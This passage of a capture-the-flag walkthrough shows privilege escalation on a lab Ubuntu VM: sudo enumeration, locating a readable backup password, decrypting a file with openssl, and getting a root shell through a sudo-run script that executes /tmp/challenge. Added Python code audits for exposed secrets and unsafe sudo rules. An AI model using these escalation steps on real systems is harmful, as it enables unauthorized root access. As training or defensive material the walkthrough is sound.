        link/ether 00:0c:29:ce:9b:03 brd ff:ff:ff:ff:ff:ff
        inet 192.168.239.134/24 brd 192.168.239.255 scope global dynamic ens33
           valid_lft 1323sec preferred_lft 1323sec
        inet6 fe80::187c:d5b0:3aa1:fcb9/64 scope link 
           valid_lft forever preferred_lft forever
    

Approach 2

Generally speaking, a kernel exploit can crash or reboot the system, and the hole may already be patched by the administrator, so kernel privilege escalation should be the last resort.

When we run sudo -l, we find:

www-data@ubuntu:/home/saket$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (root) NOPASSWD: /home/saket/enc

It tells us there is an executable, enc, that we may run as root without a password.

Inspect enc:

# Read the file
www-data@ubuntu:/home/saket$ cat ./enc
cat ./enc
cat: ./enc: Permission denied  # no read permission

# Run it
www-data@ubuntu:/home/saket$ ./enc   
./enc
enter password: follow_the_ippsec  # did not succeed

Trying strings and file in turn, both report that we lack permission. When it runs, the password it asks for is not the one we already have.

We need a password, so search the target for files that may contain one.

find / -name '*backup*' 2>/dev/null | sort | less
  • Passwords are often left in backup files, so use find to look for them
  • 2>/dev/null discards errors, sort orders the output, less pages it
# Noteworthy results:
/opt/backup
/opt/backup/server_database/backup_pass
/var/backups
# Look at /var/backups
www-data@ubuntu:/$ cd /var/backups
cd /var/backups
www-data@ubuntu:/var/backups$ ls
ls
alternatives.tar.0
apt.extended_states.0
dpkg.arch.0
dpkg.arch.1.gz
dpkg.diversions.0
dpkg.diversions.1.gz
dpkg.statoverride.0
dpkg.statoverride.1.gz
dpkg.status.0
dpkg.status.1.gz
group.bak
gshadow.bak
passwd.bak
shadow.bak
www-data@ubuntu:/var/backups$ cat passwd.bak
cat passwd.bak
cat: passwd.bak: Permission denied
www-data@ubuntu:/var/backups$ cat shadow.bak
cat shadow.bak
cat: shadow.bak: Permission denied
www-data@ubuntu:/var/backups$ cat gshadow.bak
cat gshadow.bak
cat: gshadow.bak: Permission denied
  • Nothing in /var/backups is readable by www-data
# Look at /opt/backup and /opt/backup/server_database/backup_pass
www-data@ubuntu:/var/backups$ cd /opt/backup/                             
cd /opt/backup/
www-data@ubuntu:/opt/backup$ ls
ls
server_database
www-data@ubuntu:/opt/backup$ cd /opt/backup/server_database              
cd /opt/backup/server_database
www-data@ubuntu:/opt/backup/server_database$ ls
ls
backup_pass
{hello.8}
www-data@ubuntu:/opt/backup/server_database$ cat /opt/backup/server_database/backup_pass  
</server_database$ cat /opt/backup/server_database/backup_pass               
your password for backup_database file enc is 

"backup_password"


Enjoy!
  • We obtain the password backup_password
  • find / -name '*pass*' 2>/dev/null | sort | less works too, but it can be much slower
# Run enc
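The defender's counterpart of the find above, as an added example that is not part of the original walkthrough: a small Python audit that walks the given roots, reports regular files whose names look like credential material and that are readable by "other", and then strips group/other permissions from them. The directory tree it builds under a temp dir is constructed to mirror the box (a world-readable backup_pass next to root-only .bak files); the names SECRET_HINTS, world_readable_secret_like, restrict_to_owner and build_constructed_tree are my own.

```python
import os
import stat
import tempfile

# Name fragments that suggest a file holds credentials (assumed list, extend as needed).
SECRET_HINTS = ("pass", "shadow", "backup", "secret", "key")


def world_readable_secret_like(roots):
    """Return sorted paths of regular files under `roots` that are readable by
    'other' and whose name contains one of SECRET_HINTS."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                if not any(hint in name.lower() for hint in SECRET_HINTS):
                    continue
                full = os.path.join(dirpath, name)
                try:
                    st = os.lstat(full)
                except OSError:
                    continue  # vanished or unreadable metadata: skip
                if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IROTH:
                    hits.append(full)
    return sorted(hits)


def restrict_to_owner(paths):
    """Remediation: drop all group/other permission bits (chmod go-rwx) on each path."""
    for path in paths:
        mode = os.stat(path).st_mode
        os.chmod(path, mode & ~(stat.S_IRWXG | stat.S_IRWXO))


def build_constructed_tree():
    """Constructed layout mirroring the box: one world-readable backup_pass under
    opt/backup/server_database and root-only .bak files under var/backups."""
    base = tempfile.mkdtemp(prefix="prime-audit-")
    db = os.path.join(base, "opt", "backup", "server_database")
    vb = os.path.join(base, "var", "backups")
    os.makedirs(db)
    os.makedirs(vb)
    secret = os.path.join(db, "backup_pass")
    with open(secret, "w") as f:
        f.write('your password for backup_database file enc is\n\n"backup_password"\n')
    os.chmod(secret, 0o644)  # the misconfiguration: readable by everyone
    for name in ("passwd.bak", "shadow.bak", "gshadow.bak"):
        path = os.path.join(vb, name)
        open(path, "w").close()
        os.chmod(path, 0o600)  # owner-only, as on the box
    return base


if __name__ == "__main__":
    base = build_constructed_tree()
    found = world_readable_secret_like([base])
    print("world-readable secret-like files:", found)
    restrict_to_owner(found)
    print("after remediation:", world_readable_secret_like([base]))
```

On a real host you would pass roots such as /opt, /var/backups and /home instead of the constructed tree; the check reads only file metadata, so it is safe to run as a low-privileged audit user.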
www-data@ubuntu:/home/saket$ sudo ./enc
sudo ./enc
enter password: backup_password
good
www-data@ubuntu:/home/saket$ ls
ls
enc
enc.txt
key.txt
password.txt
user.txt
  • We now have the files enc.txt and key.txt
www-data@ubuntu:/home/saket$ cat enc.txt
cat enc.txt
nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=
www-data@ubuntu:/home/saket$ cat key.txt
cat key.txt
I know you are the fan of ippsec.

So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.
  • It tells us to md5-hash ippsec and use the result to decrypt enc.txt
┌──(de1te㉿de1te)-[~]
└─$ echo -n 'ippsec' | md5sum | awk -F' ' '{print $1}'
366a74cb3c959de17d61db30591c39d1

Since we don't know which cipher was used, we try every one in a for loop.

sudo awk '{gsub(/ /,"\n");print}' hash | sort | uniq > hashs  
  • hash holds the names of all openssl ciphers; list them with openssl -help and paste them into the file

In openssl's enc module the key passed with -K is raw hex, so the md5 hex digest of ippsec has to be hex-encoded itself (each of its 32 characters becomes one key byte).

echo -n 'ippsec' | md5sum | awk -F' ' '{print $1}' | tr -d '\n' | od -A n -t x1 | tr -d '\n' | tr -d ' '
3336366137346362336339353964653137643631646233303539316333396431   
for hash in $(cat hashs); do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$hash -K 3336366137346362336339353964653137643631646233303539316333396431 2>/dev/null; echo $hash; done

Scanning the output, we find:

aes-256-ecb             
Dont worry saket one day we will reach to
our destination very soon. And if you forget 
your username then use your old password
==> "tribute_to_ippsec"  

So the file was encrypted with aes-256-ecb.
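Two details of this step are worth making explicit, so here is an added Python example (my own, not part of the walkthrough): first, the `od` pipeline above means the AES key is the ASCII text of the md5 hex digest (32 bytes, i.e. an AES-256 key), not the raw 16-byte digest; second, ECB mode encrypts every 16-byte block independently, so repeated plaintext blocks show up as repeated ciphertext blocks, which is why ECB is a poor choice for anything but single-block values. The functions openssl_raw_key, openssl_k_argument and block_report are my names; the constructed sample with three identical blocks is synthetic bytes, not real AES output.

```python
import base64
import hashlib

# Ciphertext from enc.txt as shown above (base64 text copied from the page).
PAGE_CIPHERTEXT_B64 = (
    "nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyW"
    "DT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/c"
    "Sna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4="
)


def openssl_raw_key(passphrase):
    """Key bytes that the walkthrough's shell pipeline actually hands to AES.

    The hint says to md5 'ippsec'. The pipeline then runs `od` over the
    32-character hex digest, so the key is the ASCII text of that digest:
    32 bytes, exactly an AES-256 key. The raw 16-byte digest would only be
    an AES-128 key and would not decrypt this file.
    """
    return hashlib.md5(passphrase.encode()).hexdigest().encode("ascii")


def openssl_k_argument(passphrase):
    """The 64 hex characters passed to `openssl enc -K` (the ASCII key, hex-encoded)."""
    return openssl_raw_key(passphrase).hex()


def block_report(ciphertext_b64, block_size=16):
    """Facts readable from a ciphertext without knowing the key.

    ECB encrypts each block on its own, so identical plaintext blocks give
    identical ciphertext blocks; a non-zero duplicate count is the classic
    ECB tell and the reason ECB leaks structure.
    """
    data = base64.b64decode(ciphertext_b64)
    blocks = [data[i:i + block_size] for i in range(0, len(data), block_size)]
    return {
        "length": len(data),
        # PKCS#7 padding keeps a block-cipher ciphertext a multiple of the block size
        "block_aligned": len(data) % block_size == 0,
        "duplicate_blocks": len(blocks) - len(set(blocks)),
    }


# Constructed, ciphertext-shaped sample with three identical blocks (not real AES output).
CONSTRUCTED_ECB_LIKE_B64 = base64.b64encode(bytes(range(16)) * 3 + bytes(16)).decode()


if __name__ == "__main__":
    print(openssl_k_argument("ippsec"))
    print(block_report(PAGE_CIPHERTEXT_B64))
    print(block_report(CONSTRUCTED_ECB_LIKE_B64))
```

openssl_k_argument("ippsec") reproduces the 64-character -K value used in the loop above; block_report on the constructed sample reports two duplicate blocks, the pattern that would never appear under CBC or an AEAD mode with a fresh IV.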

We now have a username and a password, so let's try ssh.

┌──(de1te㉿de1te)-[~]
└─$ sudo ssh saket@192.168.239.134 
[sudo] de1te 的密码:
saket@192.168.239.134's password: 
Permission denied, please try again.
saket@192.168.239.134's password: 
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

661 packages can be updated.
515 updates are security updates.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Sun Apr  2 18:44:13 2023 from 192.168.239.129
$ 
  • The shell is not very friendly; check whether python is installed!
dpkg -l | grep 'python*'
  • python is installed
$ python -c "import pty;pty.spawn('/bin/bash')"
saket@ubuntu:~$ 
saket@ubuntu:/tmp$ sudo -l
Matching Defaults entries for saket on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User saket may run the following commands on ubuntu:
    (root) NOPASSWD: /home/victor/undefeated_victor
saket@ubuntu:/tmp$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: Permission denied
  • The challenge file does not exist, so create one
cd /tmp
echo '#!/bin/bash' > challenge
echo '/bin/bash' >> challenge 
chmod +x challenge 
sudo /home/victor/undefeated_victor
root@ubuntu:/tmp# sudo -l 
Matching Defaults entries for root on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User root may run the following commands on ubuntu:
    (ALL : ALL) ALL
root@ubuntu:/tmp# 
  • Privilege escalation succeeded
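Both sudo rules in this box (enc for www-data, undefeated_victor for saket) share the same root cause: root is handed out through a target whose behaviour a low-privileged user can change, here a wrapper that executes /tmp/challenge. As an added example (my own code, not from the walkthrough), this Python audit parses `sudo -l` output and flags rules whose command is not absolute, does not exist, is writable by non-root, or is a script that runs something from a world-writable directory. The `sudo -l` text and the FAKE_FS map are constructed; the script body for undefeated_victor is a hypothetical reconstruction based only on the error message shown above.

```python
import re
import stat
from dataclasses import dataclass

# Constructed `sudo -l` output modelled on the listings above (not captured from the box).
SUDO_L_SAMPLE = """\
Matching Defaults entries for saket on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User saket may run the following commands on ubuntu:
    (root) NOPASSWD: /home/victor/undefeated_victor
    (root) NOPASSWD: /home/saket/enc
    (root) /usr/bin/apt-get
"""

# Constructed stand-in for the filesystem: path -> (owner, mode, script text or None for a binary).
# The undefeated_victor body is hypothetical; only the /tmp/challenge reference is taken from the page.
FAKE_FS = {
    "/home/victor/undefeated_victor": (
        "root", 0o755,
        "#!/bin/bash\necho 'if you can defeat me then challenge me in front of you'\n/tmp/challenge\n",
    ),
    "/home/saket/enc": ("root", 0o700, None),
    "/usr/bin/apt-get": ("root", 0o755, None),
}

# One rule line of `sudo -l`: "(runas) [TAG: ...] command"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z!]+:\s*)*)(?P<cmd>\S.*?)\s*$")
WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
TMP_REF_RE = re.compile(r"(?:/tmp|/var/tmp|/dev/shm)/\S+")


@dataclass
class Finding:
    command: str
    detail: str


def parse_rules(sudo_l_output):
    """Return (runas, tags, command) for each rule line in `sudo -l` output."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append((m["runas"], m["tags"].strip(), m["cmd"]))
    return rules


def audit_sudo_rules(sudo_l_output, fs):
    """Flag sudo rules that grant root through a target the user can influence."""
    findings = []
    for runas, _tags, cmd in parse_rules(sudo_l_output):
        if cmd == "ALL":
            findings.append(Finding(cmd, f"unrestricted command set as ({runas})"))
            continue
        path = cmd.split()[0]
        if not path.startswith("/"):
            findings.append(Finding(cmd, "command is not an absolute path (resolved via PATH)"))
            continue
        if path not in fs:
            findings.append(Finding(cmd, "target does not exist (dangling rule)"))
            continue
        owner, mode, content = fs[path]
        if owner != "root" or mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(Finding(cmd, f"target writable by non-root (owner={owner}, mode={oct(mode)})"))
        if path.startswith(WORLD_WRITABLE_DIRS):
            findings.append(Finding(cmd, "target lives in a world-writable directory"))
        if content:
            # A root-owned script is still unsafe if it executes a path anyone can create.
            for ref in TMP_REF_RE.findall(content):
                findings.append(Finding(cmd, f"script executes {ref} from a world-writable directory"))
    return findings


if __name__ == "__main__":
    for f in audit_sudo_rules(SUDO_L_SAMPLE, FAKE_FS):
        print(f"{f.command}: {f.detail}")
```

The fix on the box side is the mirror image of the findings: sudoers entries should name root-owned, non-writable absolute paths, and any script they point at must not execute or source files from /tmp or other directories every user can write to.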

Proof:

root@ubuntu:/tmp# cd /root
root@ubuntu:/root# ls
enc  enc.cpp  enc.txt  key.txt  root.txt  sql.py  t.sh  wfuzz  wordpress.sql
root@ubuntu:/root# cat root.txt 
b2b17036da1de94cfb024540a8e7075a
root@ubuntu:/root# 